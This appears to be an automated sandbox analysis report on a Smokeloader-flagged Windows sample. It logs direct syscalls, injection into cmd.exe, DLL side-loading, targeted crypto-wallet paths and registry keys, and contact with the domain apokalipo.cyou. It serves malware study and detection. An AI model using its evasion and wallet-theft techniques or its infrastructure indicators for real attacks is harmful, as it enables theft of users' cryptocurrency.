                  Source: C:\Users\user\AppData\Local\Temp\validPower_Lnz_x64.exeNtQueryInformationToken: Direct from: 0x7FF69E4235D8Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\validPower_Lnz_x64.exeNtQueryInformationToken: Direct from: 0x7FF69E3CA02EJump to behavior
                  Source: C:\Users\user\AppData\Roaming\TlsCloud_WRv3_x64\Virtual.exeNtProtectVirtualMemory: Direct from: 0x7FFDFAEF94F5Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\TlsCloud_WRv3_x64\Virtual.exeNtClose: Direct from: 0x78FB90
                  Source: C:\Users\user\AppData\Local\Temp\validPower_Lnz_x64.exeNtProtectVirtualMemory: Direct from: 0x7FF69E534462Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\validPower_Lnz_x64.exeNtClose: Direct from: 0x7FFE221C26A1
                  Source: C:\Users\user\AppData\Local\Temp\validPower_Lnz_x64.exeNtClose: Direct from: 0x7FF69E535671
                  Source: C:\Users\user\AppData\Roaming\TlsCloud_WRv3_x64\Virtual.exeNtAllocateVirtualMemory: Direct from: 0xA0A76ACBJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\validPower_Lnz_x64.exeNtQuerySystemInformation: Direct from: 0x7FF69E3C9664Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\validPower_Lnz_x64.exeNtQueryAttributesFile: Direct from: 0x7FF6AB7FC002Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\TlsCloud_WRv3_x64\Virtual.exeNtClose: Direct from: 0x2
                  Source: C:\Users\user\AppData\Roaming\TlsCloud_WRv3_x64\Virtual.exeNtProtectVirtualMemory: Direct from: 0x3Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\TlsCloud_WRv3_x64\Virtual.exeNtAllocateVirtualMemory: Direct from: 0x78BC70Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\TlsCloud_WRv3_x64\Virtual.exeNtCreateNamedPipeFile: Direct from: 0x8000000Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\validPower_Lnz_x64.exeNtQuerySystemInformation: Direct from: 0x7FF69E3BC002Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\validPower_Lnz_x64.exeNtAllocateVirtualMemory: Direct from: 0x14011D808Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\validPower_Lnz_x64.exeNtProtectVirtualMemory: Direct from: 0x7FF69E53DA8EJump to behavior
                  Source: C:\Windows\Temp\{8CB9D4BD-BB58-4C1B-96C8-872261C205E0}\.ba\Virtual.exeNtQuerySystemInformation: Direct from: 0xEFC1A0Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\validPower_Lnz_x64.exeNtAllocateVirtualMemory: Direct from: 0x7FF69E31A949Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\TlsCloud_WRv3_x64\Virtual.exeNtCreateFile: Direct from: 0x230E4B3Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\validPower_Lnz_x64.exeNtAllocateVirtualMemory: Direct from: 0x7FF69E3CCA0FJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\validPower_Lnz_x64.exeNtDeviceIoControlFile: Direct from: 0x7FF6AB869691Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\validPower_Lnz_x64.exeNtProtectVirtualMemory: Direct from: 0x7FF69E533508Jump to behavior
                  Source: C:\Windows\Temp\{8CB9D4BD-BB58-4C1B-96C8-872261C205E0}\.ba\Virtual.exeNtAllocateVirtualMemory: Direct from: 0x2FJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\validPower_Lnz_x64.exeNtProtectVirtualMemory: Direct from: 0x7FF69E53C195Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\TlsCloud_WRv3_x64\Virtual.exeNtAllocateVirtualMemory: Direct from: 0xAECE40Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\TlsCloud_WRv3_x64\Virtual.exeNtProtectVirtualMemory: Direct from: 0x7FFDFB3294F5Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\validPower_Lnz_x64.exeNtClose: Direct from: 0x7FF69E53564F
                  Source: C:\Users\user\AppData\Local\Temp\validPower_Lnz_x64.exeNtClose: Direct from: 0x7FF6AB975663
                  Source: C:\Users\user\AppData\Local\Temp\validPower_Lnz_x64.exeNtProtectVirtualMemory: Direct from: 0x7FF69E42AA63Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\TlsCloud_WRv3_x64\Virtual.exeNtCreateFile: Direct from: 0x277E4B3Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\validPower_Lnz_x64.exeNtCreateFile: Direct from: 0x7FF69E3CA602Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\validPower_Lnz_x64.exeNtClose: Direct from: 0x7FF6AB97564F
                  Source: C:\Users\user\AppData\Local\Temp\validPower_Lnz_x64.exeNtClose: Direct from: 0x7FF6AB7EFF06
                  Source: C:\Users\user\AppData\Local\Temp\validPower_Lnz_x64.exeNtSetInformationProcess: Direct from: 0x7FF69E3D0C7DJump to behavior
                  Source: C:\Users\user\AppData\Roaming\TlsCloud_WRv3_x64\Virtual.exeNtAllocateVirtualMemory: Direct from: 0x7FFDFAEF9635Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\validPower_Lnz_x64.exeNtReadVirtualMemory: Direct from: 0x7FF69E3C6B83Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\TlsCloud_WRv3_x64\Virtual.exeNtAllocateVirtualMemory: Direct from: 0x40Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\validPower_Lnz_x64.exeNtQueryAttributesFile: Direct from: 0x7FF6AB86AA63Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\validPower_Lnz_x64.exeNtDeviceIoControlFile: Direct from: 0x7FF69E429691Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\validPower_Lnz_x64.exeNtQueryAttributesFile: Direct from: 0x7FF6AB8A6D34Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\validPower_Lnz_x64.exeNtCreateFile: Direct from: 0x7FF69E533AF4Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\validPower_Lnz_x64.exeNtQueryValueKey: Direct from: 0x7FF69E3EDCEBJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\validPower_Lnz_x64.exeNtAllocateVirtualMemory: Direct from: 0x7FF69E3160A1Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\validPower_Lnz_x64.exeNtReadFile: Direct from: 0x7FF6AB80A809Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\validPower_Lnz_x64.exeNtSetInformationProcess: Direct from: 0x7FF69E3D200DJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\validPower_Lnz_x64.exeNtClose: Direct from: 0x14011D864
                  Source: C:\Users\user\AppData\Local\Temp\validPower_Lnz_x64.exeNtAllocateVirtualMemory: Direct from: 0x7FFE221E4B5EJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\validPower_Lnz_x64.exeNtQueryVolumeInformationFile: Direct from: 0x7FF6AB811681Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\TlsCloud_WRv3_x64\Virtual.exeNtCreateFile: Direct from: 0x2ADE4B3Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\TlsCloud_WRv3_x64\Virtual.exeNtQuerySystemInformation: Direct from: 0x7FFDFAEE2143Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\validPower_Lnz_x64.exeNtQueryValueKey: Direct from: 0x7FF69E3EE4D8Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\validPower_Lnz_x64.exeNtCreateThreadEx: Direct from: 0x7FF69E316400Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\validPower_Lnz_x64.exeNtAllocateVirtualMemory: Direct from: 0x7FF69E3D1681Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\TlsCloud_WRv3_x64\Virtual.exeNtClose: Direct from: 0xF133A0
                  Source: C:\Users\user\AppData\Local\Temp\validPower_Lnz_x64.exeNtQuerySystemInformation: Direct from: 0x7FF69E538749Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\validPower_Lnz_x64.exeNtProtectVirtualMemory: Direct from: 0x7FF69E53DB66Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\TlsCloud_WRv3_x64\Virtual.exeNtQuerySystemInformation: Direct from: 0x7FFDFB312143Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\validPower_Lnz_x64.exeNtProtectVirtualMemory: Direct from: 0x7FF69E3C62C4Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\validPower_Lnz_x64.exeNtAllocateVirtualMemory: Direct from: 0x7FF69E3C4E67Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\validPower_Lnz_x64.exeNtClose: Direct from: 0x7FF6AB974462
                  Source: C:\Users\user\AppData\Local\Temp\validPower_Lnz_x64.exeNtClose: Direct from: 0x7FF6AB975671
                  Source: C:\Users\user\AppData\Roaming\TlsCloud_WRv3_x64\Virtual.exeNtAllocateVirtualMemory: Direct from: 0x7FFDFB328E14Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\validPower_Lnz_x64.exeNtAllocateVirtualMemory: Direct from: 0x7FF69E5345E9Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\validPower_Lnz_x64.exeNtCreateFile: Direct from: 0x7FF69E5303E5Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\validPower_Lnz_x64.exeNtQueryValueKey: Direct from: 0x7FF69E3EE14EJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\validPower_Lnz_x64.exeNtAllocateVirtualMemory: Direct from: 0x7FF69E42AAABJump to behavior
                  Source: C:\Users\user\AppData\Roaming\TlsCloud_WRv3_x64\Virtual.exeNtAllocateVirtualMemory: Direct from: 0x7FFDFAEF8E14Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\TlsCloud_WRv3_x64\Virtual.exeNtAllocateVirtualMemory: Direct from: 0xF0B610Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\validPower_Lnz_x64.exeNtQueryAttributesFile: Direct from: 0x7FF6AB80A02EJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\validPower_Lnz_x64.exeNtQueryAttributesFile: Direct from: 0x7FF6AB8635D8Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\validPower_Lnz_x64.exeNtReadFile: Direct from: 0x14011D832Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\validPower_Lnz_x64.exeNtCreateFile: Direct from: 0x7FF6AB973AF4Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\TlsCloud_WRv3_x64\Virtual.exeNtQuerySystemInformation: Direct from: 0x7FFD40CB21D3Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\validPower_Lnz_x64.exeNtQueryInformationProcess: Direct from: 0x7FF69E3C0C96Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\validPower_Lnz_x64.exeNtQueryAttributesFile: Direct from: 0x7FF6AB809664Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\validPower_Lnz_x64.exeNtProtectVirtualMemory: Direct from: 0x7FF69E3BC747Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\validPower_Lnz_x64.exeNtCreateFile: Direct from: 0x14011D7A4Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\validPower_Lnz_x64.exeNtReadFile: Direct from: 0x7FF69E3CA809Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\validPower_Lnz_x64.exeNtAllocateVirtualMemory: Direct from: 0x7FF69E425B12Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\validPower_Lnz_x64.exeNtQueryInformationToken: Direct from: 0x7FF69E46A87DJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\validPower_Lnz_x64.exeNtOpenKeyEx: Direct from: 0x7FF69E3ED508Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\validPower_Lnz_x64.exeNtQueryValueKey: Direct from: 0x7FF69E3EE5EDJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\validPower_Lnz_x64.exeNtQueryInformationProcess: Direct from: 0x7FF69E3D0D55Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\TlsCloud_WRv3_x64\Virtual.exeNtProtectVirtualMemory: Direct from: 0x6C006CJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\validPower_Lnz_x64.exeNtProtectVirtualMemory: Direct from: 0x7FF69E5334D0Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\validPower_Lnz_x64.exeNtAllocateVirtualMemory: Direct from: 0x140120A3CJump to behavior
                  Maps a DLL or memory area into another process
                  Source: C:\Users\user\AppData\Roaming\TlsCloud_WRv3_x64\Virtual.exeSection loaded: NULL target: C:\Windows\SysWOW64\cmd.exe protection: read writeJump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeSection loaded: NULL target: C:\Users\user\AppData\Local\Temp\validPower_Lnz_x64.exe protection: read writeJump to behavior
                  Source: C:\Users\user\AppData\Roaming\TlsCloud_WRv3_x64\Virtual.exeSection loaded: NULL target: C:\Windows\SysWOW64\cmd.exe protection: read writeJump to behavior
                  Source: C:\Users\user\AppData\Roaming\TlsCloud_WRv3_x64\Virtual.exeSection loaded: NULL target: C:\Windows\SysWOW64\cmd.exe protection: read writeJump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeSection loaded: NULL target: C:\Users\user\AppData\Local\Temp\validPower_Lnz_x64.exe protection: read writeJump to behavior
                  Writes to foreign memory regions
                  Source: C:\Windows\SysWOW64\cmd.exeMemory written: C:\Users\user\AppData\Local\Temp\validPower_Lnz_x64.exe base: 14011BC08Jump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeMemory written: C:\Users\user\AppData\Local\Temp\validPower_Lnz_x64.exe base: 207010Jump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeMemory written: C:\Users\user\AppData\Local\Temp\validPower_Lnz_x64.exe base: 14011BC08Jump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeMemory written: C:\Users\user\AppData\Local\Temp\validPower_Lnz_x64.exe base: 2F4010Jump to behavior
                  Source: C:\Users\user\Desktop\KClGcCpDAP.exeProcess created: C:\Windows\Temp\{F5D68338-3B04-47F6-AE14-10EB1750048C}\.cr\KClGcCpDAP.exe "C:\Windows\Temp\{F5D68338-3B04-47F6-AE14-10EB1750048C}\.cr\KClGcCpDAP.exe" -burn.clean.room="C:\Users\user\Desktop\KClGcCpDAP.exe" -burn.filehandle.attached=524 -burn.filehandle.self=544 Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\TlsCloud_WRv3_x64\Virtual.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exeJump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\validPower_Lnz_x64.exe C:\Users\user\AppData\Local\Temp\validPower_Lnz_x64.exeJump to behavior
                  Source: C:\Users\user\AppData\Roaming\TlsCloud_WRv3_x64\Virtual.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exeJump to behavior
                  Source: C:\Users\user\AppData\Roaming\TlsCloud_WRv3_x64\Virtual.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exeJump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\validPower_Lnz_x64.exe C:\Users\user\AppData\Local\Temp\validPower_Lnz_x64.exeJump to behavior
                  Source: C:\Users\user\Desktop\KClGcCpDAP.exeCode function: 0_2_008B1719 InitializeSecurityDescriptor,GetLastError,CreateWellKnownSid,CreateWellKnownSid,GetLastError,CreateWellKnownSid,GetLastError,CreateWellKnownSid,GetLastError,CreateWellKnownSid,GetLastError,CreateWellKnownSid,GetLastError,SetEntriesInAclA,SetSecurityDescriptorOwner,GetLastError,SetSecurityDescriptorGroup,GetLastError,SetSecurityDescriptorDacl,GetLastError,CoInitializeSecurity,LocalFree,0_2_008B1719
                  Source: C:\Users\user\Desktop\KClGcCpDAP.exeCode function: 0_2_008B3A5F AllocateAndInitializeSid,CheckTokenMembership,0_2_008B3A5F
                  Source: Virtual.exe, 00000002.00000002.1722899571.0000000003D53000.00000004.00000020.00020000.00000000.sdmp, Virtual.exe, 00000003.00000002.1778571972.0000000003BB0000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000004.00000002.2022025745.0000000005121000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: )[%d] Shell_TrayWndTrayNotifyWnd
                  Source: C:\Users\user\Desktop\KClGcCpDAP.exeCode function: 0_2_0089EC07 cpuid 0_2_0089EC07
                  Source: C:\Windows\Temp\{8CB9D4BD-BB58-4C1B-96C8-872261C205E0}\.ba\Virtual.exeCode function: ___lc_handle_func,GetLocaleInfoW,2_2_665D9460
                  Source: C:\Users\user\AppData\Local\Temp\validPower_Lnz_x64.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion InstallDateJump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeQueries volume information: C:\ VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\KClGcCpDAP.exeCode function: 0_2_00884EDF ConvertStringSecurityDescriptorToSecurityDescriptorW,GetLastError,CreateNamedPipeW,GetLastError,CreateNamedPipeW,GetLastError,CloseHandle,LocalFree,0_2_00884EDF
                  Source: C:\Users\user\Desktop\KClGcCpDAP.exeCode function: 0_2_00876037 GetSystemTime,GetDateFormatW,GetLastError,GetLastError,GetDateFormatW,GetLastError,0_2_00876037
                  Source: C:\Users\user\Desktop\KClGcCpDAP.exeCode function: 0_2_008761DF GetUserNameW,GetLastError,0_2_008761DF
                  Source: C:\Users\user\Desktop\KClGcCpDAP.exeCode function: 0_2_008B887B GetTimeZoneInformation,SystemTimeToTzSpecificLocalTime,0_2_008B887B
                  Source: C:\Users\user\Desktop\KClGcCpDAP.exeCode function: 0_2_00875195 GetModuleHandleW,CoInitializeEx,GetVersionExW,GetLastError,CoUninitialize,0_2_00875195
                  Source: C:\Users\user\AppData\Local\Temp\validPower_Lnz_x64.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                  Stealing of Sensitive Information

                  barindex
                  Found many strings related to Crypto-Wallets (likely being stolen)
                  Source: validPower_Lnz_x64.exe, 0000000A.00000002.2222475898.0000000002D3D000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: Electrum
                  Source: validPower_Lnz_x64.exe, 0000000A.00000002.2222475898.0000000002D28000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: ZSOFTWARE\Microsoft\Windows NT\CurrentVersion\C:\Users\user\AppData\Roaming\Electrum\wallets\C:\Users\user\AppData\Roaming\Armory\databases
                  Source: validPower_Lnz_x64.exe, 0000000A.00000002.2222475898.0000000002D1F000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: wallets\JaxxLiberty\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb
                  Source: validPower_Lnz_x64.exe, 0000000A.00000002.2222475898.0000000002D32000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: wallets\Exodus\exodus.wallet
                  Source: validPower_Lnz_x64.exe, 0000000A.00000002.2222475898.0000000002D32000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: wallets\Exodus\exodus.wallet
                  Tries to harvest and steal Bitcoin Wallet information
                  Source: C:\Users\user\AppData\Local\Temp\validPower_Lnz_x64.exeKey opened: HKEY_CURRENT_USER\Software\Bitcoin\Bitcoin-QtJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\validPower_Lnz_x64.exeKey opened: HKEY_CURRENT_USER\Software\monero-project\monero-coreJump to behavior
                  Source: C:\Windows\Temp\{F5D68338-3B04-47F6-AE14-10EB1750048C}\.cr\KClGcCpDAP.exeCode function: 1_2_6E232860 _gpg_w32_bindtextdomain,strlen,malloc,memcpy,strchr,strlen,strlen,strlen,malloc,memcpy,memcpy,memcpy,free,calloc,memcpy,malloc,memcpy,EnterCriticalSection,strcmp,LeaveCriticalSection,free,free,free,EnterCriticalSection,strcmp,LeaveCriticalSection,free,free,free,free,1_2_6E232860
                  Source: C:\Windows\Temp\{F5D68338-3B04-47F6-AE14-10EB1750048C}\.cr\KClGcCpDAP.exeCode function: 1_2_6E2377E0 TlsAlloc,LocalAlloc,TlsGetValue,LocalFree,LocalAlloc,TlsSetValue,TlsGetValue,LocalFree,TlsFree,TlsSetValue,GetModuleFileNameW,WideCharToMultiByte,WideCharToMultiByte,malloc,WideCharToMultiByte,strrchr,strrchr,strcmp,strlen,_gpg_w32_bindtextdomain,free,malloc,1_2_6E2377E0

                  Mitre Att&ck Matrix

                  ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                  Gather Victim Identity InformationAcquire InfrastructureValid Accounts4
                  Native API                  		11
                  DLL Side-Loading                  		1
                  Abuse Elevation Control Mechanism                  		1
                  Deobfuscate/Decode Files or Information                  		OS Credential Dumping12
                  System Time Discovery                  		Remote Services1
                  Archive Collected Data                  		21
                  Encrypted Channel                  		Exfiltration Over Other Network MediumAbuse Accessibility Features
                  CredentialsDomainsDefault Accounts3
                  Command and Scripting Interpreter                  		1
                  Windows Service                  		11
                  DLL Side-Loading                  		1
                  Abuse Elevation Control Mechanism                  		LSASS Memory1
                  Account Discovery                  		Remote Desktop Protocol1
                  Data from Local System                  		2
                  Non-Application Layer Protocol                  		Exfiltration Over BluetoothNetwork Denial of Service
                  Email AddressesDNS ServerDomain Accounts1
                  Service Execution                  		Logon Script (Windows)1
                  Access Token Manipulation                  		3
                  Obfuscated Files or Information                  		Security Account Manager3
                  File and Directory Discovery                  		SMB/Windows Admin SharesData from Network Shared Drive13
                  Application Layer Protocol                  		Automated ExfiltrationData Encrypted for Impact
                  Employee NamesVirtual Private ServerLocal AccountsCronLogin Hook1
                  Windows Service                  		11
                  DLL Side-Loading                  		NTDS146
                  System Information Discovery                  		Distributed Component Object ModelInput CaptureProtocol ImpersonationTraffic DuplicationData Destruction
                  Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon Script213
                  Process Injection                  		1
                  File Deletion                  		LSA Secrets131
                  Security Software Discovery                  		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
                  Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts21
                  Masquerading                  		Cached Domain Credentials2
                  Process Discovery                  		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                  DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items11
                  Virtualization/Sandbox Evasion                  		DCSync11
                  Virtualization/Sandbox Evasion                  		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                  Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
                  Access Token Manipulation                  		Proc Filesystem1
                  System Owner/User Discovery                  		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                  Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt213
                  Process Injection                  		/etc/passwd and /etc/shadowNetwork SniffingDirect Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement

                  Behavior Graph

                  Hide Legend

                  Legend:

                  • Process
                  • Signature
                  • Created File
                  • DNS/IP Info
                  • Is Dropped
                  • Is Windows Process
                  • Number of created Registry Values
                  • Number of created Files
                  • Visual Basic
                  • Delphi
                  • Java
                  • .Net C# or VB.NET
                  • C, C++ or other language
                  • Is malicious
                  • Internet
                  behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1527626 Sample: KClGcCpDAP.exe Startdate: 07/10/2024 Architecture: WINDOWS Score: 96 74 apokalipo.cyou 2->74 78 Malicious sample detected (through community Yara rule) 2->78 80 Multi AV Scanner detection for submitted file 2->80 82 Yara detected UAC Bypass using CMSTP 2->82 84 AI detected suspicious sample 2->84 11 KClGcCpDAP.exe 3 2->11         started        14 Virtual.exe 1 2->14         started        17 Virtual.exe 1 2->17         started        signatures3 process4 file5 64 C:\Windows\Temp\...\KClGcCpDAP.exe, PE32 11->64 dropped 19 KClGcCpDAP.exe 14 11->19         started        110 Maps a DLL or memory area into another process 14->110 112 Found direct / indirect Syscall (likely to bypass EDR) 14->112 22 cmd.exe 2 14->22         started        25 cmd.exe 1 17->25         started        signatures6 process7 file8 50 C:\Windows\Temp\...\Virtual.exe, PE32+ 19->50 dropped 52 C:\Windows\Temp\...\msvcr100.dll, PE32+ 19->52 dropped 54 C:\Windows\Temp\...\msvcp100.dll, PE32+ 19->54 dropped 58 3 other files (none is malicious) 19->58 dropped 27 Virtual.exe 8 19->27         started        56 C:\Users\user\AppData\Local\Temp\bewwwy, PE32+ 22->56 dropped 90 Writes to foreign memory regions 22->90 92 Maps a DLL or memory area into another process 22->92 31 validPower_Lnz_x64.exe 22->31         started        33 conhost.exe 22->33         started        35 conhost.exe 25->35         started        signatures9 process10 file11 66 C:\Users\user\AppData\Roaming\...\Virtual.exe, PE32+ 27->66 dropped 68 C:\Users\user\AppData\...\msvcr100.dll, PE32+ 27->68 dropped 70 C:\Users\user\AppData\...\msvcp100.dll, PE32+ 27->70 dropped 72 2 other files (none is malicious) 27->72 dropped 102 Found direct / indirect Syscall (likely to bypass EDR) 27->102 37 Virtual.exe 1 27->37         started        signatures12 process13 signatures14 86 Maps a DLL or memory area into another process 37->86 88 Found direct / indirect Syscall (likely to bypass EDR) 37->88 40 cmd.exe 5 37->40         started        process15 file16 60 C:\Users\user\...\validPower_Lnz_x64.exe, PE32+ 40->60 dropped 62 C:\Users\user\AppData\...\jamulieilmfjkk, PE32+ 40->62 dropped 94 Writes to foreign memory regions 40->94 96 Found hidden mapped module (file has been removed from disk) 40->96 98 Maps a DLL or memory area into another process 40->98 100 Switches to a custom stack to bypass stack traces 40->100 44 validPower_Lnz_x64.exe 40->44         started        48 conhost.exe 40->48         started        signatures17 process18 dnsIp19 76 apokalipo.cyou 188.114.96.3, 443, 49739, 49740 CLOUDFLARENETUS European Union 44->76 104 Found many strings related to Crypto-Wallets (likely being stolen) 44->104 106 Tries to harvest and steal Bitcoin Wallet information 44->106 108 Found direct / indirect Syscall (likely to bypass EDR) 44->108 signatures20

                  Screenshots

                  Thumbnails

                  This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                  windows-stand

                  Antivirus, Machine Learning and Genetic Malware Detection

                  Initial Sample

                  SourceDetectionScannerLabelLink
                  KClGcCpDAP.exe8%VirustotalBrowse
                  KClGcCpDAP.exe24%ReversingLabsWin32.Trojan.Smokeloader

                  Dropped Files

                  SourceDetectionScannerLabelLink
                  C:\Users\user\AppData\Local\Temp\validPower_Lnz_x64.exe0%ReversingLabs
                  C:\Users\user\AppData\Roaming\TlsCloud_WRv3_x64\VBoxDDU.dll0%ReversingLabs
                  C:\Users\user\AppData\Roaming\TlsCloud_WRv3_x64\VBoxRT.dll3%ReversingLabs
                  C:\Users\user\AppData\Roaming\TlsCloud_WRv3_x64\Virtual.exe0%ReversingLabs
                  C:\Users\user\AppData\Roaming\TlsCloud_WRv3_x64\msvcp100.dll0%ReversingLabs
                  C:\Users\user\AppData\Roaming\TlsCloud_WRv3_x64\msvcr100.dll0%ReversingLabs
                  C:\Windows\Temp\{8CB9D4BD-BB58-4C1B-96C8-872261C205E0}\.ba\Ammonium.dll8%ReversingLabs
                  C:\Windows\Temp\{8CB9D4BD-BB58-4C1B-96C8-872261C205E0}\.ba\VBoxDDU.dll0%ReversingLabs
                  C:\Windows\Temp\{8CB9D4BD-BB58-4C1B-96C8-872261C205E0}\.ba\VBoxRT.dll3%ReversingLabs
                  C:\Windows\Temp\{8CB9D4BD-BB58-4C1B-96C8-872261C205E0}\.ba\Virtual.exe0%ReversingLabs
                  C:\Windows\Temp\{8CB9D4BD-BB58-4C1B-96C8-872261C205E0}\.ba\msvcp100.dll0%ReversingLabs
                  C:\Windows\Temp\{8CB9D4BD-BB58-4C1B-96C8-872261C205E0}\.ba\msvcr100.dll0%ReversingLabs
                  C:\Windows\Temp\{F5D68338-3B04-47F6-AE14-10EB1750048C}\.cr\KClGcCpDAP.exe8%ReversingLabs

                  Unpacked PE Files

                  No Antivirus matches

                  Domains

                  No Antivirus matches

                  URLs

                  SourceDetectionScannerLabelLink
                  http://www.openssl.org/support/faq.html0%URL Reputationsafe
                  http://crl.thawte.com/ThawteTimestampingCA.crl00%URL Reputationsafe
                  http://ocsp.thawte.com00%URL Reputationsafe
                  http://www.symauth.com/cps0(0%URL Reputationsafe
                  http://www.symauth.com/rpa000%URL Reputationsafe
                  http://crl.v0%URL Reputationsafe
                  http://www.vmware.com/00%VirustotalBrowse
                  http://www.openssl.org/support/faq.html....................D:0%VirustotalBrowse
                  http://www.softwareok.com/?Freeware/Find.Same.Images.OK0%VirustotalBrowse
                  http://virtualbox.org/firmware/VBoxEFIDual.fd0%VirustotalBrowse
                  http://virtualbox.org/firmware/VBoxEFI32.fdVBoxEFI64.fdhttp://virtualbox.org/firmware/VBoxEFI64.fdVB0%VirustotalBrowse
                  http://www.softwareok.de/?Freeware/Find.Same.Images.OK1%VirustotalBrowse
                  http://www.softwareok.com/?Freeware/Find.Same.Images.OK/History0%VirustotalBrowse
